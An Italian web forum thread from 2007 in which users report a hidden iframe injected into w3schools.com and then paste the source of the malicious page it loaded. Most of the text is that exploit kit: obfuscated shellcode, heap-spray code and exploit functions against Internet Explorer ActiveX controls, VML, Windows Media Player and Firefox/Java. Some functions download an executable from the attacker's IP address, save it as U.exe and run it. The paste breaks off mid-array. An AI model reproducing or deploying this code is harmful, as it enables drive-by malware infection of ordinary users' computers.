Utility
Home Messaggi odierni FAQ Ricerca avanzata Lo staff del forum Regolamento Utenti Archivio
Pagina 1 di 5 1 2 3 ... ultimoultimo
Visualizzazione dei risultati da 1 a 10 su 42
  1. 08-09-2007, 18:04 #1
    Vincent.Zeno
    Vincent.Zeno non è in linea
    Amministratore L'avatar di Vincent.Zeno
    Registrato dal
    May 2003
    residenza
    Emilia-Romagna (tortellini und cappelletti land!)
    Messaggi
    20,657
    Invia un messaggio tramite Skype a Vincent.Zeno

    www.w3schools.com "attaccato" [no tecnico]

    ... solo per chiacchiere

    fate attenzione hanno subito un'iniezione di iframe nascosto:
    <iframe src='http://66.246.72.200/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

    come li si avvisa?
    Creazione Spettacoli | La Cena dei Buffoni | Statua Vivente (in allestimento) |

    Rispondi quotando Rispondi quotando
  2. 08-09-2007, 18:06 #2
    andrea.paiola
    andrea.paiola non è in linea
    Utente di HTML.it L'avatar di andrea.paiola
    Registrato dal
    Nov 2004
    Messaggi
    8,058
    ma che stai dicendo?

    ahhhh w3school

    ecco il sorgente dell'iframe

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <html xmlns:IE>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
    <IE:clientCaps ID="oClientCaps" /><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

    <html xmlns:v="urn:schemas-microsoft-com:vml">

    <head>
    <script>
    var isya = 1;
    var isfl = 1;
    var isya2 = 1;
    var issdk = 1;
    </script>
    <object classid="clsid:201EA564-A6F6-11D1-811D-00C04FB6BD36" id="sdk" onerror="issdk=0;"></object>
    <object classid="CLSID:7EC7B6C5-25BD-4586-A641-D2ACBB6629DD" onerror="isya2=0;" ></object>
    <object classid="clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E" id="VMLRender" ></object>
    <object classid="clsid:00000535-0000-0010-8000-00AA006D2EA4" id="obj" ></object>
    <object classid="clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277" id="target" onerror="isya=0;"></object>
    <OBJECT ID='WZFILEVIEW' WIDTH=1 HEIGHT=1 CLASSID='CLSID:A09AE68F-B14D-43ED-B713-BA413F034904'></OBJECT>
    <style>
    v\:* { behavior: url(#VMLRender); }
    </style>
    </head>

    <body><div id='exp'></div>

    <script language="javascript">



    var up_code = String.fromCharCode(37,117,57,48,57,48,37,117,57,4 8,57,48,37,117,53,52,101,98,37,117,55,53,56,98,37, 117,56,98,51,99,37,117,51,53,55,52,37,117,48,51,55 ,56,37,117,53,54,102,53,37,117,55,54,56,98,37,117, 48,51,50,48,37,117,51,51,102,53,37,117,52,57,99,57 ,37,117,97,100,52,49,37,117,100,98,51,51,37,117,48 ,102,51,54,37,117,49,52,98,101,37,117,51,56,50,56, 37,117,55,52,102,50,37,117,99,49,48,56,37,117,48,1 00,99,98,37,117,100,97,48,51,37,117,101,98,52,48,3 7,117,51,98,101,102,37,117,55,53,100,102,37,117,53 ,101,101,55,37,117,53,101,56,98,37,117,48,51,50,52 ,37,117,54,54,100,100,37,117,48,99,56,98,37,117,56 ,98,52,98,37,117,49,99,53,101,37,117,100,100,48,51 ,37,117,48,52,56,98,37,117,48,51,56,98,37,117,99,5 1,99,53,37,117,55,50,55,53,37,117,54,100,54,99,37, 117,54,101,54,102,37,117,54,52,50,101,37,117,54,99 ,54,99,37,117,52,51,48,48,37,117,53,99,51,97,37,11 7,50,101,53,53,37,117,55,56,54,53,37,117,48,48,54, 53,37,117,99,48,51,51,37,117,48,51,54,52,37,117,51 ,48,52,48,37,117,48,99,55,56,37,117,52,48,56,98,37 ,117,56,98,48,99,37,117,49,99,55,48,37,117,56,98,9 7,100,37,117,48,56,52,48,37,117,48,57,101,98,37,11 7,52,48,56,98,37,117,56,100,51,52,37,117,55,99,52, 48,37,117,52,48,56,98,37,117,57,53,51,99,37,117,56 ,101,98,102,37,117,48,101,52,101,37,117,101,56,101 ,99,37,117,102,102,56,52,37,117,102,102,102,102,37 ,117,101,99,56,51,37,117,56,51,48,52,37,117,50,52, 50,99,37,117,102,102,51,99,37,117,57,53,100,48,37, 117,98,102,53,48,37,117,49,97,51,54,37,117,55,48,5 0,102,37,117,54,102,101,56,37,117,102,102,102,102, 37,117,56,98,102,102,37,117,50,52,53,52,37,117,56, 100,102,99,37,117,98,97,53,50,37,117,100,98,51,51, 37,117,53,51,53,51,37,117,101,98,53,50,37,117,53,5 1,50,52,37,117,100,48,102,102,37,117,98,102,53,100 ,37,117,102,101,57,56,37,117,48,101,56,97,37,117,5 3,51,101,56,37,117,102,102,102,102,37,117,56,51,10 2,102,37,117,48,52,101,99,37,117,50,99,56,51,37,11 7,54,50,50,52,37,117,100,48,102,102,37,117,55,101, 98,102,37,117,101,50,100,56,37,117,101,56,55,51,37 ,117,102,102,52,48,37,117,102,102,102,102,37,117,1 02,102,53,50,37,117,101,56,100,48,37,117,102,102,1 00,55,37,117,102,102,102,102,37,117,55,52,54,56,37 ,117,55,48,55,52,37,117,50,102,51,97,37,117,51,54, 50,102,37,117,50,101,51,54,37,117,51,52,51,50,37,1 17,50,101,51,54,37,117,51,50,51,55,37,117,51,50,50 ,101,37,117,51,48,51,48,37,117,54,53,50,102,37,117 ,54,53,55,56,37,117,55,48,50,101,37,117,55,48,54,5 6,37,117,48,48,48,48);
    var keyStr = "ABCDEFGHIJKLMNOP" + "QRSTUVWXYZabcdef" + "ghijklmnopqrstuv" + "wxyz0123456789+/" + "=";
    function decode64(input)
    {
    var output = "";
    var chr1, chr2, chr3 = "";
    var enc1, enc2, enc3, enc4 = "";
    var i = 0;
    var base64test = /[^A-Za-z0-9\+\/\=]/g;
    input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
    do
    {
    enc1 = keyStr.indexOf(input.charAt(i++));
    enc2 = keyStr.indexOf(input.charAt(i++));
    enc3 = keyStr.indexOf(input.charAt(i++));
    enc4 = keyStr.indexOf(input.charAt(i++));
    chr1 = (enc1 << 2) | (enc2 >> 4);
    chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
    chr3 = ((enc3 & 3) << 6) | enc4;
    output = output + String.fromCharCode(chr1);
    if (enc3 != 64)
    {
    output = output + String.fromCharCode(chr2);
    }
    if (enc4 != 64)
    {
    output = output + String.fromCharCode(chr3);
    }
    chr1 = chr2 = chr3 = "";
    enc1 = enc2 = enc3 = enc4 = "";
    }
    while (i < input.length);
    return output;
    }

    function testBrowser()
    {
    if ( document.defaultCharset != '' && document.defaultCharset != undefined && document.characterSet == undefined && document.body)
    {
    productVersion=window.navigator.userAgent.substr(w indow.navigator.userAgent.indexOf("MSIE")+5,3);
    var browser = "MSIE";
    }

    if (window.opera && document.defaultCharset == undefined && document.characterSet != "" && document.characterSet != undefined && self.innerHeight)
    {
    productVersion=window.navigator.userAgent.substr(w indow.navigator.userAgent.indexOf("Opera")+6,4);
    var browser = "Opera";
    }

    if (document.defaultCharset == undefined && !window.opera && document.characterSet != "" && (self.innerHeight))
    {
    productVersion=window.navigator.userAgent.substr(w indow.navigator.userAgent.indexOf("Gecko")+6,8)+ ' ('+ window.navigator.userAgent.substr(8,3) + ')';
    var browser = "Firefox";
    }

    if (productVersion == "")
    {
    var browser = window.navigator.userAgent;
    }
    return browser;
    }

    function getVersion()
    {
    var osversion = "";
    var osplatform = "";
    osversion = navigator.appVersion;
    osplatform = navigator.platform
    if (osplatform.search("Win32") != -1)
    {
    if (osversion.indexOf('Windows 95') != -1) return "95"
    else if (osversion.indexOf('Windows NT 4') != -1) return "NT"
    else if (osversion.indexOf('Win 9x 4.9') != -1) return "ME"
    else if (osversion.indexOf('Windows 98') != -1) return "98"
    else if (osversion.indexOf('SV1') != -1) return "SP2"
    else if (osversion.indexOf('Windows NT 5.0') != -1) return "2K"
    else if (osversion.indexOf('Windows NT 5.1') != -1) return "XP"
    else if (osversion.indexOf('Windows NT 5.2') != -1) return "2K3"
    }
    }

    function makeMemory()
    {
    var up_payLoad = unescape(up_code);
    up_memBlock = eval(String.fromCharCode(117,110,101,115,99,97,112 ,101))(String.fromCharCode(37,117,48,53,48,53,37,1 17,48,53,48,53));
    up_memSize = 20;
    up_memDump = up_memSize+up_payLoad.length;
    while (up_memBlock.length<up_memDump)
    {
    up_memBlock+=up_memBlock;
    }
    up_memFill = up_memBlock.substring(0, up_memDump);
    up_tempBlock = up_memBlock.substring(0, up_memBlock.length-up_memDump);
    while(up_tempBlock.length+up_memDump<0x40000)
    {
    eval("up_tempBlock = up_tempBlock+up_tempBlock+up_memFill");
    }
    up_myMemory = new Array();
    for (i=0;i<350;i++) up_myMemory[i] = eval("up_tempBlock + up_payLoad");
    isMemory = true;
    }

    function findOffset(OffsetSlide, OffsetSlideSize)
    {
    while (OffsetSlide.length*2<OffsetSlideSize)
    {
    OffsetSlide+=OffsetSlide;
    }
    OffsetSlide=OffsetSlide.substring(0,OffsetSlideSiz e/2);
    return OffsetSlide;
    }

    function setslice_exploit()
    {
    if (isMemory == false ) makeMemory();
    count = 129-1;
    for(i=0;i<count;i++)
    try
    {
    var slice = eval(decode64('bmV3IEFjdGl2ZVhPYmplY3QoJ1dlYlZpZXd Gb2xkZXJJY29uLldlYlZpZXdGb2xkZXJJY29uLjEnKTs='));
    eval(decode64('c2xpY2Uuc2V0U2xpY2UoMHg3ZmZmZmZmZSw gMHgwNTA1MDUwNSwgMHgwNTA1MDUwNSwweDA1MDUwNTA1ICk7' ));
    }
    catch(e){}
    setTimeout("vml_exploit();",interval * 500);
    }




    New year, new site
    Rispondi quotando Rispondi quotando
  3. 08-09-2007, 18:12 #3
    andrea.paiola
    andrea.paiola non è in linea
    Utente di HTML.it L'avatar di andrea.paiola
    Registrato dal
    Nov 2004
    Messaggi
    8,058

    function vml_exploit()
    {
    if (isMemory == false ) makeMemory();
    myDiv = document.getElementById('exp');
    exploit = "<v:rect style='width:120pt;height:80pt' fillcolor=\"red\" >";
    exploit += "<v:recolorinfo recolorstate=\"t\" numcolors=\"97612895\">";
    for (i=0;i<44;i++) exploit += "<v:recolorinfoentry tocolor=\"rgb(1,1,1)\" recolortype=\"1285\ lbcolor=\"rgb(1,1,1)\" forecolor=\"rgb(1,1,1)\" backcolor=\"rgb(1,1,1)\" fromcolor=\"rgb(1,1,1)\" lbstyle =\"32\" bitmaptype=\"3\"/> " ;
    exploit += "<v/recolorinfo>";
    myDiv.innerHTML = exploit;
    }

    function firefox_exploit()
    {

    firefoxPay = unescape(String.fromCharCode(37,117,57,48,57,48,37 ,117,57,48,57,48,37,117,53,52,101,98,37,117,55,53, 56,98,37,117,56,98,51,99,37,117,51,53,55,52,37,117 ,48,51,55,56,37,117,53,54,102,53,37,117,55,54,56,9 8,37,117,48,51,50,48,37,117,51,51,102,53,37,117,52 ,57,99,57,37,117,97,100,52,49,37,117,100,98,51,51, 37,117,48,102,51,54,37,117,49,52,98,101,37,117,51, 56,50,56,37,117,55,52,102,50,37,117,99,49,48,56,37 ,117,48,100,99,98,37,117,100,97,48,51,37,117,101,9 8,52,48,37,117,51,98,101,102,37,117,55,53,100,102, 37,117,53,101,101,55,37,117,53,101,56,98,37,117,48 ,51,50,52,37,117,54,54,100,100,37,117,48,99,56,98, 37,117,56,98,52,98,37,117,49,99,53,101,37,117,100, 100,48,51,37,117,48,52,56,98,37,117,48,51,56,98,37 ,117,99,51,99,53,37,117,55,50,55,53,37,117,54,100, 54,99,37,117,54,101,54,102,37,117,54,52,50,101,37, 117,54,99,54,99,37,117,52,51,48,48,37,117,53,99,51 ,97,37,117,50,101,53,53,37,117,55,56,54,53,37,117, 48,48,54,53,37,117,99,48,51,51,37,117,48,51,54,52, 37,117,51,48,52,48,37,117,48,99,55,56,37,117,52,48 ,56,98,37,117,56,98,48,99,37,117,49,99,55,48,37,11 7,56,98,97,100,37,117,48,56,52,48,37,117,48,57,101 ,98,37,117,52,48,56,98,37,117,56,100,51,52,37,117, 55,99,52,48,37,117,52,48,56,98,37,117,57,53,51,99, 37,117,56,101,98,102,37,117,48,101,52,101,37,117,1 01,56,101,99,37,117,102,102,56,52,37,117,102,102,1 02,102,37,117,101,99,56,51,37,117,56,51,48,52,37,1 17,50,52,50,99,37,117,102,102,51,99,37,117,57,53,1 00,48,37,117,98,102,53,48,37,117,49,97,51,54,37,11 7,55,48,50,102,37,117,54,102,101,56,37,117,102,102 ,102,102,37,117,56,98,102,102,37,117,50,52,53,52,3 7,117,56,100,102,99,37,117,98,97,53,50,37,117,100, 98,51,51,37,117,53,51,53,51,37,117,101,98,53,50,37 ,117,53,51,50,52,37,117,100,48,102,102,37,117,98,1 02,53,100,37,117,102,101,57,56,37,117,48,101,56,97 ,37,117,53,51,101,56,37,117,102,102,102,102,37,117 ,56,51,102,102,37,117,48,52,101,99,37,117,50,99,56 ,51,37,117,54,50,50,52,37,117,100,48,102,102,37,11 7,55,101,98,102,37,117,101,50,100,56,37,117,101,56 ,55,51,37,117,102,102,52,48,37,117,102,102,102,102 ,37,117,102,102,53,50,37,117,101,56,100,48,37,117, 102,102,100,55,37,117,102,102,102,102,37,117,55,52 ,54,56,37,117,55,48,55,52,37,117,50,102,51,97,37,1 17,51,54,50,102,37,117,50,101,51,54,37,117,51,52,5 1,50,37,117,50,101,51,54,37,117,51,50,51,55,37,117 ,51,50,50,101,37,117,51,48,51,48,37,117,54,53,50,1 02,37,117,54,53,55,56,37,117,55,48,50,101,37,117,5 5,48,54,56,37,117,48,48,48,48));
    fill = eval(String.fromCharCode(117,110,101,115,99,97,112 ,101,40,39,37,117,48,56,48,48,39,41,59));
    addr = 0x08000800;
    b = fill;
    while (b.length <= 0x400000) { b += b; }
    var c = new Array();
    for (var i =0; i <36 ; i++)
    {
    c[i] =
    eval(String.fromCharCode(98,46,115,117,98,115,116, 114,105,110,103))(0,0x100000 - firefoxPay.length) + firefoxPay +
    eval(String.fromCharCode(98,46,115,117,98,115,116, 114,105,110,103))(0,0x100000 - firefoxPay.length) + firefoxPay +
    eval(String.fromCharCode(98,46,115,117,98,115,116, 114,105,110,103))(0,0x100000 - firefoxPay.length) + firefoxPay +
    b.substring(0, 0x100000 - firefoxPay.length) + firefoxPay;
    }
    if (window.navigator.javaEnabled)
    {
    window.navigator = (addr / 2);
    try { java.lang.reflect.Runtime.newInstance(java.lang.Cl ass.forName(String.fromCharCode(106,97,118,97,46,1 08,97,110,103,46,82,117,110,116,105,109,101)), 0); }
    catch(e){}
    }
    }

    function firefox1_exploit()
    {
    location.href = String.fromCharCode(106,97,118,97,115,99,114,105,1 12,116,58,118,111,105,100,32,40,110,101,119,32,73, 110,115,116,97,108,108,86,101,114,115,105,111,110, 40,41,41,59);
    up_heapOffset = 0x12000000;
    mdacPay = unescape(String.fromCharCode(37,117,57,48,57,48,37 ,117,57,48,57,48,37,117,53,52,101,98,37,117,55,53, 56,98,37,117,56,98,51,99,37,117,51,53,55,52,37,117 ,48,51,55,56,37,117,53,54,102,53,37,117,55,54,56,9 8,37,117,48,51,50,48,37,117,51,51,102,53,37,117,52 ,57,99,57,37,117,97,100,52,49,37,117,100,98,51,51, 37,117,48,102,51,54,37,117,49,52,98,101,37,117,51, 56,50,56,37,117,55,52,102,50,37,117,99,49,48,56,37 ,117,48,100,99,98,37,117,100,97,48,51,37,117,101,9 8,52,48,37,117,51,98,101,102,37,117,55,53,100,102, 37,117,53,101,101,55,37,117,53,101,56,98,37,117,48 ,51,50,52,37,117,54,54,100,100,37,117,48,99,56,98, 37,117,56,98,52,98,37,117,49,99,53,101,37,117,100, 100,48,51,37,117,48,52,56,98,37,117,48,51,56,98,37 ,117,99,51,99,53,37,117,55,50,55,53,37,117,54,100, 54,99,37,117,54,101,54,102,37,117,54,52,50,101,37, 117,54,99,54,99,37,117,52,51,48,48,37,117,53,99,51 ,97,37,117,50,101,53,53,37,117,55,56,54,53,37,117, 48,48,54,53,37,117,99,48,51,51,37,117,48,51,54,52, 37,117,51,48,52,48,37,117,48,99,55,56,37,117,52,48 ,56,98,37,117,56,98,48,99,37,117,49,99,55,48,37,11 7,56,98,97,100,37,117,48,56,52,48,37,117,48,57,101 ,98,37,117,52,48,56,98,37,117,56,100,51,52,37,117, 55,99,52,48,37,117,52,48,56,98,37,117,57,53,51,99, 37,117,56,101,98,102,37,117,48,101,52,101,37,117,1 01,56,101,99,37,117,102,102,56,52,37,117,102,102,1 02,102,37,117,101,99,56,51,37,117,56,51,48,52,37,1 17,50,52,50,99,37,117,102,102,51,99,37,117,57,53,1 00,48,37,117,98,102,53,48,37,117,49,97,51,54,37,11 7,55,48,50,102,37,117,54,102,101,56,37,117,102,102 ,102,102,37,117,56,98,102,102,37,117,50,52,53,52,3 7,117,56,100,102,99,37,117,98,97,53,50,37,117,100, 98,51,51,37,117,53,51,53,51,37,117,101,98,53,50,37 ,117,53,51,50,52,37,117,100,48,102,102,37,117,98,1 02,53,100,37,117,102,101,57,56,37,117,48,101,56,97 ,37,117,53,51,101,56,37,117,102,102,102,102,37,117 ,56,51,102,102,37,117,48,52,101,99,37,117,50,99,56 ,51,37,117,54,50,50,52,37,117,100,48,102,102,37,11 7,55,101,98,102,37,117,101,50,100,56,37,117,101,56 ,55,51,37,117,102,102,52,48,37,117,102,102,102,102 ,37,117,102,102,53,50,37,117,101,56,100,48,37,117, 102,102,100,55,37,117,102,102,102,102,37,117,55,52 ,54,56,37,117,55,48,55,52,37,117,50,102,51,97,37,1 17,51,54,50,102,37,117,50,101,51,54,37,117,51,52,5 1,50,37,117,50,101,51,54,37,117,51,50,51,55,37,117 ,51,50,50,101,37,117,51,48,51,48,37,117,54,53,50,1 02,37,117,54,53,55,56,37,117,55,48,50,101,37,117,5 5,48,54,56,37,117,48,48,48,48));
    up_heapOffsetSize = 0x400000;
    paySize = mdacPay.length * 2;
    up_spraySize = up_heapOffsetSize-(paySize+0x38);
    up_sprayOffset1 = eval(String.fromCharCode(117,110,101,115,99,97,112 ,101,40,34,37,117,48,48,50,67,37,117,49,49,67,48,3 4,41,59));
    up_sprayOffset1 = findOffset(up_sprayOffset1,up_spraySize);
    up_sprayOffset2 = eval(String.fromCharCode(117,110,101,115,99,97,112 ,101,40,34,37,117,48,48,50,67,37,117,49,50,48,48,3 4,41,59));
    up_sprayOffset2 = findOffset(up_sprayOffset2,up_spraySize);
    up_sprayOffset3 = eval(String.fromCharCode(117,110,101,115,99,97,112 ,101,40,34,37,117,57,48,57,48,37,117,57,48,57,48,3 4,41,59));
    up_sprayOffset3 = findOffset(up_sprayOffset3,up_spraySize);
    heapOffsetB = (up_heapOffset-0x400000)/up_heapOffsetSize;
    newMem = new Array();
    for (i=0;i<heapOffsetB;i++)
    {
    newMem[i]=(i%3==0) ? up_sprayOffset1 + mdacPay: (i%3==1) ? up_sprayOffset2 + mdacPay: up_sprayOffset3 + mdacPay;
    }
    eval(String.fromCharCode(117,112,95,111,102,102,11 5,101,116,32,61,32,48,120,49,49,56,48,48,48,50,67, 59));
    eval(String.fromCharCode(40,110,101,119,32,73,110, 115,116,97,108,108,86,101,114,115,105,111,110,41,4 6,99,111,109,112,97,114,101,84,111,40,110,101,119, 32,78,117,109,98,101,114,40,117,112,95,111,102,102 ,115,101,116,32,62,62,32,49,41,41,59));
    }

    function wmplayer_exploit()
    {
    s = unescape( String.fromCharCode(37,117,52,49,52,49,37,117,52,4 9,52,49,37,117,52,49,52,49,37,117,52,49,52,49,37,1 17,52,49,52,49,37,117,52,49,52,49,37,117,52,49,52, 49,37,117,52,49,52,49) );
    do { s+=s; } while(s.length<0x0900000);s+= unescape(String.fromCharCode(37,117,57,48,57,48,37 ,117,57,48,57,48,37,117,53,52,101,98,37,117,55,53, 56,98,37,117,56,98,51,99,37,117,51,53,55,52,37,117 ,48,51,55,56,37,117,53,54,102,53,37,117,55,54,56,9 8,37,117,48,51,50,48,37,117,51,51,102,53,37,117,52 ,57,99,57,37,117,97,100,52,49,37,117,100,98,51,51, 37,117,48,102,51,54,37,117,49,52,98,101,37,117,51, 56,50,56,37,117,55,52,102,50,37,117,99,49,48,56,37 ,117,48,100,99,98,37,117,100,97,48,51,37,117,101,9 8,52,48,37,117,51,98,101,102,37,117,55,53,100,102, 37,117,53,101,101,55,37,117,53,101,56,98,37,117,48 ,51,50,52,37,117,54,54,100,100,37,117,48,99,56,98, 37,117,56,98,52,98,37,117,49,99,53,101,37,117,100, 100,48,51,37,117,48,52,56,98,37,117,48,51,56,98,37 ,117,99,51,99,53,37,117,55,50,55,53,37,117,54,100, 54,99,37,117,54,101,54,102,37,117,54,52,50,101,37, 117,54,99,54,99,37,117,52,51,48,48,37,117,53,99,51 ,97,37,117,50,101,53,53,37,117,55,56,54,53,37,117, 48,48,54,53,37,117,99,48,51,51,37,117,48,51,54,52, 37,117,51,48,52,48,37,117,48,99,55,56,37,117,52,48 ,56,98,37,117,56,98,48,99,37,117,49,99,55,48,37,11 7,56,98,97,100,37,117,48,56,52,48,37,117,48,57,101 ,98,37,117,52,48,56,98,37,117,56,100,51,52,37,117, 55,99,52,48,37,117,52,48,56,98,37,117,57,53,51,99, 37,117,56,101,98,102,37,117,48,101,52,101,37,117,1 01,56,101,99,37,117,102,102,56,52,37,117,102,102,1 02,102,37,117,101,99,56,51,37,117,56,51,48,52,37,1 17,50,52,50,99,37,117,102,102,51,99,37,117,57,53,1 00,48,37,117,98,102,53,48,37,117,49,97,51,54,37,11 7,55,48,50,102,37,117,54,102,101,56,37,117,102,102 ,102,102,37,117,56,98,102,102,37,117,50,52,53,52,3 7,117,56,100,102,99,37,117,98,97,53,50,37,117,100, 98,51,51,37,117,53,51,53,51,37,117,101,98,53,50,37 ,117,53,51,50,52,37,117,100,48,102,102,37,117,98,1 02,53,100,37,117,102,101,57,56,37,117,48,101,56,97 ,37,117,53,51,101,56,37,117,102,102,102,102,37,117 ,56,51,102,102,37,117,48,52,101,99,37,117,50,99,56 ,51,37,117,54,50,50,52,37,117,100,48,102,102,37,11 7,55,101,98,102,37,117,101,50,100,56,37,117,101,56 ,55,51,37,117,102,102,52,48,37,117,102,102,102,102 ,37,117,102,102,53,50,37,117,101,56,100,48,37,117, 102,102,100,55,37,117,102,102,102,102,37,117,55,52 ,54,56,37,117,55,48,55,52,37,117,50,102,51,97,37,1 17,51,54,50,102,37,117,50,101,51,54,37,117,51,52,5 1,50,37,117,50,101,51,54,37,117,51,50,51,55,37,117 ,51,50,50,101,37,117,51,48,51,48,37,117,54,53,50,1 02,37,117,54,53,55,56,37,117,55,48,50,101,37,117,5 5,48,54,56,37,117,48,48,48,48));
    myDiv = document.getElementById('exp');
    exploit='<E'+'MB'+'ED S'+'R'+'C="---------------------'+'--------------------------'+'------------'+'-------'+'-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------'+'-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKK'+'KKLLL LAAANNN'+'NOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVW'+'WW WXXXXYYYYZZZZ0000111122223333'+'444455556666777788 889999.wmv"></EM'+'BED>';
    myDiv.innerHTML = exploit;
    }




    New year, new site
    Rispondi quotando Rispondi quotando
  4. 08-09-2007, 18:13 #4
    Vincent.Zeno
    Vincent.Zeno non è in linea
    Amministratore L'avatar di Vincent.Zeno
    Registrato dal
    May 2003
    residenza
    Emilia-Romagna (tortellini und cappelletti land!)
    Messaggi
    20,657
    Invia un messaggio tramite Skype a Vincent.Zeno
    e che roba è?

    NOD 32 me lo ferma come Trojan
    Creazione Spettacoli | La Cena dei Buffoni | Statua Vivente (in allestimento) |

    Rispondi quotando Rispondi quotando
  5. 08-09-2007, 18:13 #5
    fred84
    fred84 non è in linea
    Utente di HTML.it L'avatar di fred84
    Registrato dal
    Dec 2005
    Messaggi
    434
    e meno male che non era tecnico.....
    Rispondi quotando Rispondi quotando
  6. 08-09-2007, 18:14 #6
    andrea.paiola
    andrea.paiola non è in linea
    Utente di HTML.it L'avatar di andrea.paiola
    Registrato dal
    Nov 2004
    Messaggi
    8,058
    function sdk_exploit()
    {
    if (isMemory == false ) makeMemory();
    var tmp = "\x0A\x0A\x0A\x0A";
    var tmp_size = 1044;
    while(tmp.length < (tmp_size * 2)) tmp += tmp;
    tmp = tmp.substring(0, tmp_size);
    sdk.SourceUrl = tmp;
    location.reload();
    }


    function yahoo_exploit()
    {
    if (isMemory == false ) makeMemory();
    var target = document.createElement("object");
    target.setAttribute("classid", "clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277");
    myBuff = '\x0a';
    while (myBuff.length < 5000) myBuff += '\x0a\x0a\x0a\x0a';
    eval(String.fromCharCode(116,97,114,103,101,116,46 ,115,101,114)+"ver = myBuff;");
    eval("target"+"."+String.fromCharCode(114,101,99,1 01,105,118,101,40,41)+";");

    }


    function yahoo2_exploit()
    {
    if (isMemory == false ) makeMemory();

    var target1 = document.createElement("object");
    target1.setAttribute("classid", "CLSID:7EC7B6C5-25BD-4586-A641-D2ACBB6629DD");
    var buffer = unescape("%0a0a");
    while (buffer.length < 845) buffer+='\x0A';
    while (buffer.length< 1000) buffer+=unescape("%u0a0a");
    eval();

    }

    function winzip_exploit()
    {
    if (isMemory == false ) makeMemory();
    var buf = String.fromCharCode(65);
    while (buf.length < 512) buf+='\x09';
    eval(String.fromCharCode(87,90,70,73,76,69,86,73,6 9,87,46,67,114,101,97,116,101,78,101,119,70,111,10 8,100,101,114,70,114,111,109,78,97,109,101,40,98,1 17,102,41,59));
    }



    function w2k_exploit()
    {
    exploit = "var xml = new Ac"+"tiv"+"eX"+"Object('Mic'+'ros'+'oft.X'+'ML"+"H TTP');";
    exploit += "xml.Open('GET','http://66.246.72.200/exe.php',0);xml.Send();";
    exploit += "var stream = new Ac"+"ti"+"veXO"+"bj"+"ect('AD"+"ODB.Stre"+"am');st ream.Mode = 3;";
    exploit += "stream.Type = 1;stream.Open();stream.Write(xml.responseBody);str eam.SaveToFile('../U.exe',2); ";
    payCode = escape(exploit);
    pocCode = 'res://mmcndmgr.dll/pr'+'evsym12.htm#%29%3B%3C/style%3E%3Cscript%20lan'+'guage%3D%27js'+'cript%27 %3Ea%3Dnew%20ActiveXObject%28%27She'+'ll.App'+'lic ation%27%29%3B'+payCode+'a.Shel'+'lExec'+'ute%28%2 7../U.exe%27%29%3B%3C/sc'+'ript%3E%3C%21--//%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0';
    document.location = pocCode;
    }

    function newRdsObject(o, n)
    {
    var r = null;
    var ddd=null;
    try { eval("r = o."+String.fromCharCode(67,114,101,97,116,101,79,9 8,106,101,99,116)+"(n)") }catch(e){}
    if (! r) {try { eval("r = o."+String.fromCharCode(67,114,101,97,116,101)+dec ode64(String.fromCharCode(98,50,74,113,90,87,78,48 ))+"(n, \"\")") }catch(e){}}
    if (! r) {try { eval("r = o."+String.fromCharCode(67,114,101,97,116,101)+dec ode64(String.fromCharCode(98,50,74,113,90,87,78,48 ))+"(n, \"\", \"\")") }catch(e){}}
    if (! r) {try { eval("r = o."+String.fromCharCode(71,101,116)+decode64(Strin g.fromCharCode(98,50,74,113,90,87,78,48))+"(\"\", n)") }catch(e){}}
    if (! r) {try { eval("r = o."+String.fromCharCode(71,101,116)+decode64(Strin g.fromCharCode(98,50,74,113,90,87,78,48))+"(n, \"\")") }catch(e){}}
    if (! r) {try { eval("r = o."+String.fromCharCode(71,101,116)+decode64(Strin g.fromCharCode(98,50,74,113,90,87,78,48))+"(n)") }catch(e){}}
    ddd=r;
    return(ddd);
    }
    var mdk=0;
    function Go(a)
    {

    var obj_exploit = newRdsObject(a,String.fromCharCode(109,115,120,109 ,108,50,46,88,77,76,72,84,84,80));
    obj_exploit.open(String.fromCharCode(71,69,84),"ht tp://66.246.72.200/exe.php",false);
    eval("obj_exploit"+decode64("LnNlbmQoKTs="));
    var obj_adodb = newRdsObject(a,String.fromCharCode(97,100,111,100, 98,46,115,116,114,101,97,109));
    obj_adodb.type = 1;
    eval(decode64("b2JqX2Fkb2RiLm9wZW4oKTs="));
    eval("obj_adodb"+".Write"+"("+decode64("b2JqX2V4cG xvaXQucmVzcG9uc2VCb2R5")+");");
    var fn = "C:\\\\U.exe";
    eval("obj_adodb"+"."+decode64("U2F2ZVRvRmlsZQ==")+ "(fn,2);");
    var s = newRdsObject(a, decode64("U2hlbGwuQXBwbGljYXRpb24="));
    try { s.ShellExecute(fn); mdk=1; } catch(e) { }


    }

    function makePayLoad()
    {
    var mdacPay = new Array(
    String.fromCharCode(123,66,68,57,54,67,53,53,54,45 ,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,4 8,67,48,52,70,67,50,57,69,51,48,125),
    String.fromCharCode(123,66,68,57,54,67,53,53,54,45 ,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,4 8,67,48,52,70,67,50,57,69,51,54,125),
    String.fromCharCode(123,65,66,57,66,67,69,68,68,45 ,69,67,55,69,45,52,55,69,49,45,57,51,50,50,45,68,5 2,65,50,49,48,54,49,55,49,49,54,125),
